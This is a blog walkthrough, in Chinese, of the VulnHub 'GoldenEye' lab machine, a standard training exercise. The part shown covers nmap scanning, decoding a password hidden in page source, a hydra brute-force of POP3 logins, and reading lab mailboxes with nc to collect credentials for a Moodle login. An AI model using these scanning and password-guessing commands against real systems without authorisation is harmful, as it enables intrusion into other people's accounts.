<!DOCTYPE html>
<html lang="zh-CN">
<head>
    <meta charset="utf-8">
    <meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1">
    <meta name="keywords" content="Hexo Theme Keep">
    <meta name="description" content="Hexo Theme Keep">
    <meta name="author" content="forg12">
    
    <title>
        
            vulnhub_goldeneye |
        
        forg12&#39;s Blog
    </title>
    
<link rel="stylesheet" href="/css/style.css">

    <link rel="shortcut icon" href="/images/logo.svg">
    
<link rel="stylesheet" href="/css/font-awesome.min.css">

    <script id="hexo-configurations">
    let KEEP = window.KEEP || {};
    KEEP.hexo_config = {"hostname":"forg1222.github.io","root":"/","language":"zh-CN","path":"search.json"};
    KEEP.theme_config = {"toc":{"enable":true,"number":true,"expand_all":true,"init_open":true},"style":{"primary_color":"#0066CC","avatar":"https://forg1222.github.io/images/head.jpeg","favicon":"/images/logo.svg","article_img_align":"left","left_side_width":"260px","content_max_width":"920px","hover":{"shadow":false,"scale":false},"first_screen":{"enable":true,"background_img":"https://forg1222.github.io/images/bg.svg","description":"Keep writing and Keep loving."},"scroll":{"progress_bar":{"enable":false},"percent":{"enable":false}}},"local_search":{"enable":true,"preload":true},"code_copy":{"enable":true,"style":"default"},"pjax":{"enable":false},"lazyload":{"enable":false},"version":"6.6.6"};
    KEEP.language_ago = {"second":"%s 秒前","minute":"%s 分钟前","hour":"%s 小时前","day":"%s 天前","week":"%s 周前","month":"%s 个月前","year":"%s 年前"};
  </script>
<meta name="generator" content="Hexo 6.2.0"></head>


<body>
<div class="progress-bar-container">
    

    
</div>


<main class="page-container">

    

    <div class="page-main-content">

        <div class="page-main-content-top">
            <header class="header-wrapper">

    <div class="header-content">
        <div class="left">
            
            <a class="logo-title" href="/">
                forg12&#39;s Blog
            </a>
        </div>

        <div class="right">
            <div class="pc">
                <ul class="menu-list">
                    
                        <li class="menu-item">
                            <a class=""
                               href="/"
                            >
                                首页
                            </a>
                        </li>
                    
                        <li class="menu-item">
                            <a class=""
                               href="/archives"
                            >
                                归档
                            </a>
                        </li>
                    
                        <li class="menu-item">
                            <a class=""
                               href="/categories"
                            >
                                分类
                            </a>
                        </li>
                    
                        <li class="menu-item">
                            <a class=""
                               href="/tags"
                            >
                                标签
                            </a>
                        </li>
                    
                        <li class="menu-item">
                            <a class=""
                               href="/about"
                            >
                                关于
                            </a>
                        </li>
                    
                    
                        <li class="menu-item search search-popup-trigger">
                            <i class="fas fa-search"></i>
                        </li>
                    
                </ul>
            </div>
            <div class="mobile">
                
                    <div class="icon-item search search-popup-trigger"><i class="fas fa-search"></i></div>
                
                <div class="icon-item menu-bar">
                    <div class="menu-bar-middle"></div>
                </div>
            </div>
        </div>
    </div>

    <div class="header-drawer">
        <ul class="drawer-menu-list">
            
                <li class="drawer-menu-item flex-center">
                    <a class=""
                       href="/">首页</a>
                </li>
            
                <li class="drawer-menu-item flex-center">
                    <a class=""
                       href="/archives">归档</a>
                </li>
            
                <li class="drawer-menu-item flex-center">
                    <a class=""
                       href="/categories">分类</a>
                </li>
            
                <li class="drawer-menu-item flex-center">
                    <a class=""
                       href="/tags">标签</a>
                </li>
            
                <li class="drawer-menu-item flex-center">
                    <a class=""
                       href="/about">关于</a>
                </li>
            
        </ul>
    </div>

    <div class="window-mask"></div>

</header>


        </div>

        <div class="page-main-content-middle">

            <div class="main-content">

                
                    <div class="fade-in-down-animation">
    <div class="article-content-container">

        <div class="article-title">
            <span class="title-hover-animation">vulnhub_goldeneye</span>
        </div>

        
            <div class="article-header">
                <div class="avatar">
                    <img src="https://forg1222.github.io/images/head.jpeg">
                </div>
                <div class="info">
                    <div class="author">
                        <span class="name">forg12</span>
                        
                    </div>
                    <div class="meta-info">
                        <div class="article-meta-info">
    <span class="article-date article-meta-item">
        <i class="fas fa-edit"></i>&nbsp;
        <span class="pc">2022-08-01 17:49:33</span>
        <span class="mobile">2022-08-01 17:49</span>
    </span>
    
        <span class="article-categories article-meta-item">
            <i class="fas fa-folder"></i>&nbsp;
            <ul>
                
                    <li>
                        <a href="/categories/vulnhub/">vulnhub</a>&nbsp;
                    </li>
                
            </ul>
        </span>
    
    
        <span class="article-tags article-meta-item">
            <i class="fas fa-tags"></i>&nbsp;
            <ul>
                
                    <li>
                        <a href="/tags/vulnhub/">vulnhub</a>&nbsp;
                    </li>
                
            </ul>
        </span>
    

    
    
        <span class="article-wordcount article-meta-item">
            <i class="fas fa-file-word"></i>&nbsp;<span>4.3k 字</span>
        </span>
    
    
    
        <span class="article-pv article-meta-item">
            <i class="fas fa-eye"></i>&nbsp;<span id="busuanzi_value_page_pv"></span>
        </span>
    
</div>

                    </div>
                </div>
            </div>
        

        <div class="article-content markdown-body">
            <h1 id="概述"><a href="#概述" class="headerlink" title="概述"></a>概述</h1><ol>
<li>信息收集获取moodle的admin密码</li>
<li>moodle admin权限下，通过CVE-2013-3630 getshell</li>
<li>CVE-2015-1328本地提权</li>
</ol>
<h1 id="信息收集"><a href="#信息收集" class="headerlink" title="信息收集"></a>信息收集</h1><h2 id="获取靶机IP"><a href="#获取靶机IP" class="headerlink" title="获取靶机IP"></a>获取靶机IP</h2><figure class="highlight shell"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line">nmap -sP 192.168.56.0/24</span><br><span class="line"></span><br><span class="line">Nmap scan report for 192.168.56.103</span><br><span class="line">Host is up (0.40s latency).</span><br></pre></td></tr></table></figure>

<h2 id="端口服务扫描"><a href="#端口服务扫描" class="headerlink" title="端口服务扫描"></a>端口服务扫描</h2><p>全端口扫描、获取所有信息</p>
<figure class="highlight shell"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br></pre></td><td class="code"><pre><span class="line">nmap -p- 192.168.56.103</span><br><span class="line"></span><br><span class="line">PORT      STATE SERVICE</span><br><span class="line">25/tcp    open  smtp</span><br><span class="line">53/tcp    open  domain</span><br><span class="line">80/tcp    open  http</span><br><span class="line">55006/tcp open  unknown</span><br><span class="line">55007/tcp open  unknown</span><br><span class="line"></span><br><span class="line"></span><br><span class="line">nmap -sS -sV -T5 -p25,53,80,55006,55007 192.168.56.103</span><br><span class="line"></span><br><span class="line">PORT      STATE SERVICE  VERSION</span><br><span class="line">25/tcp    open  smtp     Postfix smtpd</span><br><span class="line">53/tcp    open  domain   dnsmasq 2.81</span><br><span class="line">80/tcp    open  http     Apache httpd 2.4.7 ((Ubuntu))</span><br><span class="line">55006/tcp open  ssl/pop3 Dovecot pop3d</span><br><span class="line">55007/tcp open  pop3     Dovecot pop3d</span><br></pre></td></tr></table></figure>



<h2 id="80端口"><a href="#80端口" class="headerlink" title="80端口"></a>80端口</h2><p><img src="/2022/08/01/vulnhub-goldeneye/image-20220804144319883.png" alt="image-20220804144319883"></p>
<h3 id="进入-x2F-sev-home路径"><a href="#进入-x2F-sev-home路径" class="headerlink" title="进入&#x2F;sev-home路径"></a>进入&#x2F;sev-home路径</h3><p><img src="/2022/08/01/vulnhub-goldeneye/1658900270195-467e2724-b251-443b-9464-99dcdfaa8d3e.png" alt="img"></p>
<h3 id="查看网页源码"><a href="#查看网页源码" class="headerlink" title="查看网页源码"></a>查看网页源码</h3><p><img src="/2022/08/01/vulnhub-goldeneye/image-20220804144737820.png" alt="image-20220804144737820"></p>
<h3 id="打开terminal-js"><a href="#打开terminal-js" class="headerlink" title="打开terminal.js"></a>打开terminal.js</h3><p><img src="/2022/08/01/vulnhub-goldeneye/1658900304907-bc7b6e09-f24d-4f9f-8593-b45950cfc3eb.png" alt="img"></p>
<figure class="highlight shell"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br></pre></td><td class="code"><pre><span class="line">//Boris, make sure you update your default password. </span><br><span class="line">//My sources say MI6 maybe planning to infiltrate. </span><br><span class="line">//Be on the lookout for any suspicious network traffic....</span><br><span class="line">//</span><br><span class="line">//I encoded you p@ssword below...</span><br><span class="line">//</span><br><span class="line">//&amp;#73;&amp;#110;&amp;#118;&amp;#105;&amp;#110;&amp;#99;&amp;#105;&amp;#98;&amp;#108;&amp;#101;&amp;#72;&amp;#97;&amp;#99;&amp;#107;&amp;#51;&amp;#114;</span><br><span class="line">//</span><br><span class="line">//BTW Natalya says she can break your codes</span><br><span class="line"></span><br><span class="line">翻译：</span><br><span class="line">//Boris，确保更新默认密码。</span><br><span class="line">//我的消息来源说军情六处可能计划渗透。</span><br><span class="line">//警惕任何可疑的网络流量。。。。</span><br><span class="line">//</span><br><span class="line">//我给你编码p@ssword在下面</span><br><span class="line">//</span><br><span class="line">//</span><br><span class="line">//顺便说一句，Natalya说她可以破解你的密码</span><br></pre></td></tr></table></figure>

<h4 id="html-decode"><a href="#html-decode" class="headerlink" title="html-decode"></a>html-decode</h4><p><img src="/2022/08/01/vulnhub-goldeneye/1658887650897-4773e805-0fc7-4490-a097-cc78c46aa0a9.png" alt="img"></p>
<h4 id="获取信息"><a href="#获取信息" class="headerlink" title="获取信息"></a>获取信息</h4><figure class="highlight shell"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line">name:</span><br><span class="line">  Boris</span><br><span class="line">  Natalya</span><br><span class="line">pwd:</span><br><span class="line">  InvincibleHack3r</span><br></pre></td></tr></table></figure>

<h3 id="认证通过-x2F-sev-home"><a href="#认证通过-x2F-sev-home" class="headerlink" title="认证通过&#x2F;sev-home"></a>认证通过&#x2F;sev-home</h3><p>​	根据提示信息，成功通过&#x2F;sev-home。</p>
<p>登录成功的信息为：</p>
<p>​	boris&#x2F;InvincibleHack3r</p>
<p><img src="/2022/08/01/vulnhub-goldeneye/1658923548253-ca118e5d-b425-4d48-b7ca-136a7b3820ca.png" alt="img"></p>
<p><img src="/2022/08/01/vulnhub-goldeneye/1658900655460-676e418b-c447-4ae0-a3cc-6b2e1fd0898c.png" alt="img"></p>
<figure class="highlight shell"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br></pre></td><td class="code"><pre><span class="line">&lt;h1&gt;GoldenEye&lt;/h1&gt;</span><br><span class="line">&lt;p&gt;GoldenEye is a Top Secret Soviet oribtal weapons project. Since you have access you definitely hold a Top Secret clearance and qualify to be a certified GoldenEye Network Operator (GNO) &lt;/p&gt;</span><br><span class="line">&lt;p&gt;Please email a qualified GNO supervisor to receive the online &lt;b&gt;GoldenEye Operators Training&lt;/b&gt; to become an Administrator of the GoldenEye system&lt;/p&gt;</span><br><span class="line">&lt;p&gt;Remember, since &lt;b&gt;&lt;i&gt;security by obscurity&lt;/i&gt;&lt;/b&gt; is very effective, we have configured our pop3 service to run on a very high non-default port&lt;/p&gt;</span><br><span class="line">&lt;/div&gt;</span><br><span class="line">&lt;h1&gt;黄金眼&lt;/h1&gt;</span><br><span class="line">&lt;p&gt;GoldenEye是一个高度机密的苏联原始武器项目。由于您有访问权限，您肯定持有绝密许可证，并有资格成为认证的GoldenEye网络运营商（GNO）&lt;/p&gt;</span><br><span class="line">&lt;p&gt;请向合格的GNO主管发送电子邮件，接受在线GoldenEye操作员培训，成为GoldenEye系统管理员&lt;/p&gt;</span><br><span class="line">&lt;p&gt;请记住，由于模糊安全非常有效，我们已将pop3服务配置为在非常高的非默认端口上运行&lt;/p&gt;</span><br><span class="line">&lt;/div&gt;</span><br></pre></td></tr></table></figure>

<h2 id="55006与55007端口"><a href="#55006与55007端口" class="headerlink" title="55006与55007端口"></a>55006与55007端口</h2><p>​	通过nmap扫描这两个端口开启的服务的详细信息。</p>
<figure class="highlight shell"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br></pre></td><td class="code"><pre><span class="line">┌──(kali㉿Kali)-[~]</span><br><span class="line">└─$ nmap -p55006,55007 -sV -A -T4 192.168.56.103</span><br><span class="line">Nmap scan report for 192.168.56.103</span><br><span class="line">Host is up (0.34s latency).</span><br><span class="line"></span><br><span class="line">PORT      STATE SERVICE  VERSION</span><br><span class="line">55006/tcp open  ssl/pop3 Dovecot pop3d</span><br><span class="line">| ssl-cert: Subject: commonName=localhost/organizationName=Dovecot mail server</span><br><span class="line">| Not valid before: 2018-04-24T03:23:52</span><br><span class="line">|_Not valid after:  2028-04-23T03:23:52</span><br><span class="line">|_ssl-date: TLS randomness does not represent time</span><br><span class="line">55007/tcp open  pop3     Dovecot pop3d</span><br><span class="line">|_pop3-capabilities: AUTH-RESP-CODE USER SASL(PLAIN) PIPELINING RESP-CODES UIDL CAPA TOP STLS</span><br><span class="line">|_ssl-date: TLS randomness does not represent time</span><br><span class="line">| ssl-cert: Subject: commonName=localhost/organizationName=Dovecot mail server</span><br><span class="line">| Not valid before: 2018-04-24T03:23:52</span><br><span class="line">|_Not valid after:  2028-04-23T03:23:52</span><br><span class="line"></span><br><span class="line">Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .</span><br><span class="line">Nmap done: 1 IP address (1 host up) scanned in 51.45 seconds</span><br><span class="line"></span><br></pre></td></tr></table></figure>

<p>​	通过探测的结果可以知道，这两个端口开放了pop3的mail服务，根据提示信息，在mail服务中，可能存在Boris未修改默认密码。</p>
<h3 id="Hydra暴力破解pop3服务"><a href="#Hydra暴力破解pop3服务" class="headerlink" title="Hydra暴力破解pop3服务"></a>Hydra暴力破解pop3服务</h3><p>​	根据提示信息，搜集到的用户名字典为：</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">boris</span><br><span class="line">natalya</span><br></pre></td></tr></table></figure>

<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br></pre></td><td class="code"><pre><span class="line">hydra -L name.txt -P /usr/share/wordlists/fasttrack.txt 192.168.56.103 -s 55007 pop3</span><br><span class="line"></span><br><span class="line">[55007][pop3] host: 192.168.56.103   login: boris   password: secret1!</span><br><span class="line">[55007][pop3] host: 192.168.56.103   login: natalya   password: bird</span><br><span class="line"></span><br><span class="line">1 of 1 target successfully completed, 2 valid passwords found</span><br><span class="line"></span><br></pre></td></tr></table></figure>

<p>​	通过hydra进行爆破，得到了两个账号的密码，接下来通过对其进行信息收集。通过nc对</p>
<h4 id="boris账号"><a href="#boris账号" class="headerlink" title="boris账号"></a>boris账号</h4><figure class="highlight shell"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br><span class="line">53</span><br><span class="line">54</span><br><span class="line">55</span><br><span class="line">56</span><br><span class="line">57</span><br><span class="line">58</span><br><span class="line">59</span><br><span class="line">60</span><br><span class="line">61</span><br><span class="line">62</span><br><span class="line">63</span><br></pre></td><td class="code"><pre><span class="line">nc 192.168.56.103 55007</span><br><span class="line">+OK GoldenEye POP3 Electronic-Mail System</span><br><span class="line"></span><br><span class="line">user boris</span><br><span class="line">+OK</span><br><span class="line">pass secret1!</span><br><span class="line">+OK Logged in.</span><br><span class="line">list</span><br><span class="line">+OK 3 messages:</span><br><span class="line">1 544</span><br><span class="line">2 373</span><br><span class="line">3 921</span><br><span class="line">.</span><br><span class="line">retr 1</span><br><span class="line">+OK 544 octets</span><br><span class="line">Return-Path: &lt;root@127.0.0.1.goldeneye&gt;</span><br><span class="line">X-Original-To: boris</span><br><span class="line">Delivered-To: boris@ubuntu</span><br><span class="line">Received: from ok (localhost [127.0.0.1])</span><br><span class="line">        by ubuntu (Postfix) with SMTP id D9E47454B1</span><br><span class="line">        for &lt;boris&gt;; Tue, 2 Apr 1990 19:22:14 -0700 (PDT)</span><br><span class="line">Message-Id: &lt;20180425022326.D9E47454B1@ubuntu&gt;</span><br><span class="line">Date: Tue, 2 Apr 1990 19:22:14 -0700 (PDT)</span><br><span class="line">From: root@127.0.0.1.goldeneye</span><br><span class="line"></span><br><span class="line">Boris, this is admin. You can electronically communicate to co-workers and students here. I&#x27;m not going to scan emails for security risks because I trust you and the other admins here.</span><br><span class="line">.</span><br><span class="line">retr 2  </span><br><span class="line">+OK 373 octets</span><br><span class="line">Return-Path: &lt;natalya@ubuntu&gt;</span><br><span class="line">X-Original-To: boris</span><br><span class="line">Delivered-To: boris@ubuntu</span><br><span class="line">Received: from ok (localhost [127.0.0.1])</span><br><span class="line">        by ubuntu (Postfix) with ESMTP id C3F2B454B1</span><br><span class="line">        for &lt;boris&gt;; Tue, 21 Apr 1995 19:42:35 -0700 (PDT)</span><br><span class="line">Message-Id: &lt;20180425024249.C3F2B454B1@ubuntu&gt;</span><br><span class="line">Date: Tue, 21 Apr 1995 19:42:35 -0700 (PDT)</span><br><span class="line">From: natalya@ubuntu</span><br><span class="line"></span><br><span class="line">Boris, I can break your codes!</span><br><span class="line">.</span><br><span class="line">retr 3</span><br><span class="line">+OK 921 octets</span><br><span class="line">Return-Path: &lt;alec@janus.boss&gt;</span><br><span class="line">X-Original-To: boris</span><br><span class="line">Delivered-To: boris@ubuntu</span><br><span class="line">Received: from janus (localhost [127.0.0.1])</span><br><span class="line">        by ubuntu (Postfix) with ESMTP id 4B9F4454B1</span><br><span class="line">        for &lt;boris&gt;; Wed, 22 Apr 1995 19:51:48 -0700 (PDT)</span><br><span class="line">Message-Id: &lt;20180425025235.4B9F4454B1@ubuntu&gt;</span><br><span class="line">Date: Wed, 22 Apr 1995 19:51:48 -0700 (PDT)</span><br><span class="line">From: alec@janus.boss</span><br><span class="line"></span><br><span class="line">Boris,</span><br><span class="line"></span><br><span class="line">Your cooperation with our syndicate will pay off big. Attached are the final access codes for GoldenEye. Place them in a hidden file within the root directory of this server then remove from this email. There can only be one set of these acces codes, and we need to secure them for the final execution. If they are retrieved and captured our plan will crash and burn!</span><br><span class="line"></span><br><span class="line">Once Xenia gets access to the training site and becomes familiar with the GoldenEye Terminal codes we will push to our final stages....</span><br><span class="line"></span><br><span class="line">PS - Keep security tight or we will be compromised.</span><br><span class="line"></span><br><span class="line">.</span><br><span class="line"></span><br></pre></td></tr></table></figure>

<p>翻译：</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br></pre></td><td class="code"><pre><span class="line">From: root@127.0.0.1.goldeneye</span><br><span class="line">鲍里斯，这是管理员。 您可以在此处与同事和学生进行电子交流。 我不会扫描电子邮件是否存在安全风险，因为我相信你和这里的其他管理员。</span><br><span class="line"></span><br><span class="line"></span><br><span class="line">From: natalya@ubuntu</span><br><span class="line">鲍里斯，我可以破解你的密码！</span><br><span class="line"></span><br><span class="line"></span><br><span class="line">From: alec@janus.boss</span><br><span class="line">鲍里斯，</span><br><span class="line"></span><br><span class="line">您与我们辛迪加的合作将获得丰厚回报。 附件是 GoldenEye 的最终访问代码。 将它们放在此服务器根目录中的隐藏文件中，然后从该电子邮件中删除。 这些访问代码只能有一组，我们需要保护它们以供最终执行。 如果他们被找回并被俘虏，我们的计划将会崩溃和燃烧！</span><br></pre></td></tr></table></figure>



<h4 id="natalya账号"><a href="#natalya账号" class="headerlink" title="natalya账号"></a>natalya账号</h4><figure class="highlight shell"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br><span class="line">53</span><br><span class="line">54</span><br><span class="line">55</span><br><span class="line">56</span><br><span class="line">57</span><br></pre></td><td class="code"><pre><span class="line">nc 192.168.56.103 55007</span><br><span class="line">use+OK GoldenEye POP3 Electronic-Mail System</span><br><span class="line">user natalya</span><br><span class="line">+OK</span><br><span class="line">pass bird</span><br><span class="line">+OK Logged in.</span><br><span class="line">list</span><br><span class="line">+OK 2 messages:</span><br><span class="line">1 631</span><br><span class="line">2 1048</span><br><span class="line">.</span><br><span class="line">retr 1</span><br><span class="line">+OK 631 octets</span><br><span class="line">Return-Path: &lt;root@ubuntu&gt;</span><br><span class="line">X-Original-To: natalya</span><br><span class="line">Delivered-To: natalya@ubuntu</span><br><span class="line">Received: from ok (localhost [127.0.0.1])</span><br><span class="line">        by ubuntu (Postfix) with ESMTP id D5EDA454B1</span><br><span class="line">        for &lt;natalya&gt;; Tue, 10 Apr 1995 19:45:33 -0700 (PDT)</span><br><span class="line">Message-Id: &lt;20180425024542.D5EDA454B1@ubuntu&gt;</span><br><span class="line">Date: Tue, 10 Apr 1995 19:45:33 -0700 (PDT)</span><br><span class="line">From: root@ubuntu</span><br><span class="line"></span><br><span class="line">Natalya, please you need to stop breaking boris&#x27; codes. Also, you are GNO supervisor for training. I will email you once a student is designated to you.</span><br><span class="line"></span><br><span class="line">Also, be cautious of possible network breaches. We have intel that GoldenEye is being sought after by a crime syndicate named Janus.</span><br><span class="line">.</span><br><span class="line">retr 2</span><br><span class="line">+OK 1048 octets</span><br><span class="line">Return-Path: &lt;root@ubuntu&gt;</span><br><span class="line">X-Original-To: natalya</span><br><span class="line">Delivered-To: natalya@ubuntu</span><br><span class="line">Received: from root (localhost [127.0.0.1])</span><br><span class="line">        by ubuntu (Postfix) with SMTP id 17C96454B1</span><br><span class="line">        for &lt;natalya&gt;; Tue, 29 Apr 1995 20:19:42 -0700 (PDT)</span><br><span class="line">Message-Id: &lt;20180425031956.17C96454B1@ubuntu&gt;</span><br><span class="line">Date: Tue, 29 Apr 1995 20:19:42 -0700 (PDT)</span><br><span class="line">From: root@ubuntu</span><br><span class="line"></span><br><span class="line">Ok Natalyn I have a new student for you. As this is a new system please let me or boris know if you see any config issues, especially is it&#x27;s related to security...even if it&#x27;s not, just enter it in under the guise of &quot;security&quot;...it&#x27;ll get the change order escalated without much hassle :)</span><br><span class="line"></span><br><span class="line">Ok, user creds are:</span><br><span class="line"></span><br><span class="line">username: xenia</span><br><span class="line">password: RCP90rulez!</span><br><span class="line"></span><br><span class="line">Boris verified her as a valid contractor so just create the account ok?</span><br><span class="line"></span><br><span class="line">And if you didn&#x27;t have the URL on outr internal Domain: severnaya-station.com/gnocertdir</span><br><span class="line">**Make sure to edit your host file since you usually work remote off-network....</span><br><span class="line"></span><br><span class="line">Since you&#x27;re a Linux user just point this servers IP to severnaya-station.com in /etc/hosts.</span><br><span class="line"></span><br><span class="line"></span><br><span class="line">.</span><br><span class="line"></span><br><span class="line"></span><br></pre></td></tr></table></figure>

<p>翻译：</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br></pre></td><td class="code"><pre><span class="line">From: root@ubuntu</span><br><span class="line">娜塔莉亚，请你不要再破坏鲍里斯的密码了。 此外，您是 GNO 培训主管。 一旦学生被指定给您，我将通过电子邮件发送给您。</span><br><span class="line">此外，请注意可能的网络漏洞。 我们有情报表明，一个名为 Janus 的犯罪集团正在追捕 GoldenEye。</span><br><span class="line"></span><br><span class="line"></span><br><span class="line">From: root@ubuntu</span><br><span class="line">好的，娜塔琳，我有一个新学生要给你。 由于这是一个新系统，如果您发现任何配置问题，请让我或鲍里斯知道，尤其是它与安全性有关...即使不是，只需以“安全性”为幌子输入...它会 毫不费力地升级变更单 :)</span><br><span class="line"></span><br><span class="line">好的，用户信用是：</span><br><span class="line">用户名：xenia</span><br><span class="line">密码：RCP90rulez！</span><br><span class="line"></span><br><span class="line">Boris 验证了她是一个有效的承包商，所以只需创建帐户，好吗？</span><br><span class="line"></span><br><span class="line">如果您没有外部内部域的 URL：severnaya-station.com/gnocertdir</span><br><span class="line">**请确保编辑您的主机文件，因为您通常在远程离线工作......</span><br><span class="line"></span><br><span class="line">由于您是 Linux 用户，只需将此服务器 IP 指向 /etc/hosts 中的 severnaya-station.com。</span><br></pre></td></tr></table></figure>

<h4 id="重要信息提取"><a href="#重要信息提取" class="headerlink" title="重要信息提取"></a>重要信息提取</h4><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line">username:xenia</span><br><span class="line">password:RCP90rulez！</span><br><span class="line">domain:severnaya-station.com</span><br><span class="line">URL:severnaya-station.com/gnocertdir</span><br></pre></td></tr></table></figure>

<h2 id="访问severnaya-station-com-x2F-gnocertdir"><a href="#访问severnaya-station-com-x2F-gnocertdir" class="headerlink" title="访问severnaya-station.com&#x2F;gnocertdir"></a>访问severnaya-station.com&#x2F;gnocertdir</h2><h3 id="修改hosts文件"><a href="#修改hosts文件" class="headerlink" title="修改hosts文件"></a>修改hosts文件</h3><p>根据提示信息，首先修改hosts文件，然后访问信息中的URL地址。</p>
<p><img src="/2022/08/01/vulnhub-goldeneye/image-20220805090640391.png" alt="image-20220805090640391"></p>
<p><img src="/2022/08/01/vulnhub-goldeneye/image-20220805091130313.png" alt="image-20220805091130313"></p>
<h3 id="登录地址"><a href="#登录地址" class="headerlink" title="登录地址"></a>登录地址</h3><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">http://severnaya-station.com/gnocertdir/login/index.php</span><br></pre></td></tr></table></figure>

<p>根据前面得到的账号密码尝试登录。</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">xenia/RCP90rulez！</span><br></pre></td></tr></table></figure>

<p><img src="/2022/08/01/vulnhub-goldeneye/image-20220805091354586.png" alt="image-20220805091354586"></p>
<p>邮箱中只存在一封邮件：</p>
<p><img src="/2022/08/01/vulnhub-goldeneye/image-20220805101800135.png" alt="image-20220805101800135"></p>
